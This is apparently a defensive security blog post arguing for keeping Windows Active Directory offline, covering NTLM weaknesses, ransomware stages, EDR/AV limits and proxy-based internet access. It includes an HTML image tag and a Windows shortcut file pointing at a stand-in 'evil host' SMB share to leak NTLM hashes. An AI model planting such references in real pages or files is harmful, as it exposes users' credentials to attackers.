Not only since my seven security tips1 have I been getting questions about why I prefer to keep Windows and an Active Directory2 offline. That may sound inflexible, and in an era of AI-generated cybersecurity slop3 I may look like an outsider.
So in today’s blog post I provide more context, explain the technical background, and lay out how ransomware works. Finally, I show how an AD operated offline can still be used with the internet and email as usual.
Contextualization
Firstly a few words for better orientation with statements most will agree with:
- A single technical measure is rarely the solution to a larger, complex problem.
- All technical measures inherently have flaws and add complexity, which increases risks and the attack surface.
We are dealing with the so-called Swiss cheese model, first described scientifically by James Reason4 when analyzing aviation accidents. Many years ago, I wrote about this on the neighboring blog.5
Applied to IT this means: A measure such as an offline kept AD is only one protective layer. Taken on its own it’s only quite effective. The benefit of risk reduction arises only in combination with other protective and independent layers. So that a trajectory of accident opportunity does not punch through the protective layers as shown in the sketch.
These layers can also be non-technical in nature for example: Standard operation procedures (SOP) saying that all administrative interventions must be conducted in combination with tickets. Perfectly sufficient and accepted for audit trails.6
Application whitelisting and antivirus programs are examples of technical protective layers, more on these later.
The structural problem in every Windows
It’s in the nature of things that an IT system performs authentication when accessing a resource. Put simply, modern systems exchange cryptographic keys in the background so that users do not have to re-enter their credentials every time.
Microsoft Windows attempts to perform this key exchange in newer versions using the relatively secure Kerberos protocol7. With misconfiguration or older systems, however, a protocol downgrade8 can occur and NTLM9 in its various versions continues to be accepted.
NTLM is old. Nomen est omen: It’s the successor of the 1980s LAN Manager10 for the NT platform11 and has been considered insecure since the late 1990s.12 The problem has been known for decades and is structurally present in all Windows versions.
Microsoft does recommend disabling NTLM or at least reducing it.13 Unfortunately, the GPO and registry settings for this remain disabled by default on every server to this day.14 The “holy cow of backward compatibility”, which I already discussed in another blog post15, leaves operators behind.16 Numerous legacy programs and services buried deep in Windows behind all the fancy UI still continue to communicate using NTLM.17
There is also the aggravating fact that in practice you find hardly a network without older machines. Disabling NTLM would block file exchange with these. My saddest find so far: In 2021 I found a NT4 Workstation on an industrial site.18
Exfiltration of NTLM keys
Why is NTLM so dangerous today? Just one example makes it clear how NTLM keys can be easily extracted and nowadays decrypted even online.19 Any resource embedded in HTML that points to an SMB share causes a Windows system to disclose its keys (NTLM response):
<!DOCTYPE html>
<html>
<head></head>
<body>
<img src="file://\\ip-or-dns-evil-host\share\dummy.png">
</body>
</html>
It gets even more trivial in Windows Explorer shortcuts:
[InternetShortcut]
URL=https://wellknown-host
IconIndex=0
IconFile=\\ip-or-dns-evil-host\leak\leak.ico
When uncontrolled communication to the internet is possible, Windows willingly shares its keys.20 Telekom and other ISPs have blocked outbound SMB port 445 in the consumer segment since WannaCry,21 but not in business tariffs and even less does that bother an attacker. For years, rogue servers22 have collected keys directly on affected machines and forwarded them for further poisoning, pass-the-hash, or relay attacks.23 As shown in the screenshot below, a simple “dir” is needed:
Windows doesn’t lose its keys only through SMB port 445. Microsoft has always been very creative when it comes to expanding the attack surface by softening protocol boundaries. Over the years numerous SMB features and authentication options have been added. SMB Direct24 or SMB over QUIC on UDP 44325 come to mind first. Depending on IIS configuration on any Exchange or RDS terminal server, authentication can also occur via TCP 443 or, if an admin isn’t careful, even unencrypted via TCP 80 using BasicAuth26.
How Ransomware Works
Ransomware attacks can be broken down into two fundamental intermediate objectives:
- Execution of administrative tools and executables
- Establishing a communication channel
This quickly makes it clear how essential Application Whitelisting27 and an offline AD are. Application Whitelisting prevents the execution of a captured dropper.28 Taking the AD offline prevents the download of the payload,29 often a reverse shell30 for communication with one or more command-and-control hosts (C&C) on the internet.31
If an attacker achieves only one of the two objectives, the attack fizzles out and remains limited to individual machines that can easily be replaced or cleaned up.
The reverse situation means victory for the attacker. The following steps present little difficulty in typical Windows AD scenarios:
- Privilege escalation and persistence
- Lateral movement
- Data exfiltration for extortion
- Manipulation or destruction of backups
- Encryption
As a reference, I like to point to the publicly available incident report on the ransomware case at SIT in South Westphalia,32 still the largest infrastructure incident in the Federal Republic of Germany.33
But We Have EDR/AV Software
Time, creativity, expertise, and technical resources are almost unlimited for attackers, while defenders usually struggle with limited means. Three trends I’ve personally observed in recent years:
- Attackers mostly use Windows built-in tools.
- Executables are compiled “on-site” on the target computer.
- EDR/AV software34 is ineffective.35
My Clipboard Auditor so far never has been detected or blocked as malware.36 That doesn’t mean it’s particularly good. No EDR/AV in the past decade has ever managed to detect any new ransomware wave and protection cannot be scientifically verified:37
Quite alarmingly, we illustrate that no EDR can efficiently detect and prevent the four attack vectors we deployed.
There are also fundamental, Microsoft-typical implementation flaws.38 Since the CrowdStrike incident,39 it should be clear that EDR/AV itself poses a security risk and that marketing promises rendered meaningless in the EULA.40
To go forward without EDR/AV software is difficult. Therefore, for a fully offline AD, the Defender built into every Windows system is sufficient. It helps with compliance and keeps costs and the SBOM41 low.
Offline Yet Online?
Keeping an AD offline does not mean users cannot work. Proxy servers have provided controlled access to the internet for decades.42 The details are:
- Web browsers must not write their settings into Windows system settings.
- Proxy servers must not have SSO/ NTLM/ Kerberos integration.
- Proxy settings in both the system and web browser must not be changeable by users.
Microsoft Edge, due to its deep integration with the underlying Windows, is a total failure here. Instead, Mozilla Firefox43 is used, with its ADMX group policy templates.44
Email clients are even simpler. There’s hardly anything to configure if they connect to a groupware server or mail gateway45 within the local network.
If the mail server is outside the organization, it’s sufficient to register the host with its handful egress46 ports in the enterprise firewall.
And because Microsoft has been gradually making WSUS47 worse over time,48 internal GitOps update pipelines can keep the AD up to date. What I described for “digital twins” last year also applies here.49
The major advantage of an offline-operated system: the “update pressure” and attack surface are significantly reduced.
The second major advantage: You become more independent from vendor’s product decisions and lifecycles.
Let’s be honest, everyone should be aware that locally operated AD infrastructures have no future at Microsoft. Those who don’t want to follow the path into the Azure AI cloud, and there are good reasons not to, should use the remaining time wisely to realign technology stacks and infrastructures.
I’m happy to help with advice and practical support.
With that in mind,
Yours,
Tomas Jakobs
https://blog.jakobs.systems/blog/20240506-service-tips-windows/ ↩︎
https://ul-fluglehrer.de/blog/files/20160321-fehlerquelle-mensch.html ↩︎
https://insecure.org/sploits/winnt.automatic.authentication.html ↩︎
https://learn.microsoft.com/de-de/previous-versions/windows/it-pro/windows-10/security/threat-protection/security-policy-settings/network-security-restrict-ntlm-ntlm-authentication-in-this-domain ↩︎
https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/security-policy-settings/network-security-restrict-ntlm-outgoing-ntlm-traffic-to-remote-servers ↩︎
https://blog.jakobs.systems/blog/20250712-vom-messdiener-zum-ketzer/ ↩︎
https://blog.jakobs.systems/micro/20210727-security-by-microsoft/ ↩︎
https://learn.microsoft.com/de-de/windows-server/security/kerberos/ntlm-overview ↩︎
https://blog.jakobs.systems/blog/20211121-industrie-nt-4/ ↩︎
https://securify.nl/blog/living-off-the-land-stealing-netntlm-hashes/ ↩︎
https://hackingarticles.in/a-detailed-guide-on-responder-llmnr-poisoning/ ↩︎
https://learn.microsoft.com/en-us/windows-server/storage/file-server/smb-direct ↩︎
https://learn.microsoft.com/en-us/windows-server/storage/file-server/smb-over-quic ↩︎
https://en.wikipedia.org/wiki/Basic_access_authentication ↩︎
https://en.wikipedia.org/wiki/Whitelist#Application_whitelists ↩︎
https://blog.jakobs.systems/micro/20240128-sit-ransomware-abschlussbericht/ ↩︎
https://blog.jakobs.systems/blog/20240926-sit-desaster-nrw/ ↩︎
https://en.wikipedia.org/wiki/Endpoint_detection_and_response ↩︎
https://theregister.com/2025/08/14/edr_killers_ransomware/ ↩︎
https://blog.jakobs.systems/micro/20250509-defender-disabled/ ↩︎
https://en.wikipedia.org/wiki/2024_CrowdStrike-related_IT_outages ↩︎
https://blog.jakobs.systems/micro/20240720-tolduso-moment/ ↩︎
https://proxmox.com/en/products/proxmox-mail-gateway/overview ↩︎
https://en.wikipedia.org/wiki/Windows_Server_Update_Services ↩︎
https://borncity.com/blog/2025/09/15/windows-11-trouble-mit-wsus-gpos-und-update-source-sowie-agpm-eol/ ↩︎
https://blog.jakobs.systems/micro/20241016-hyperv-backups-faq/ ↩︎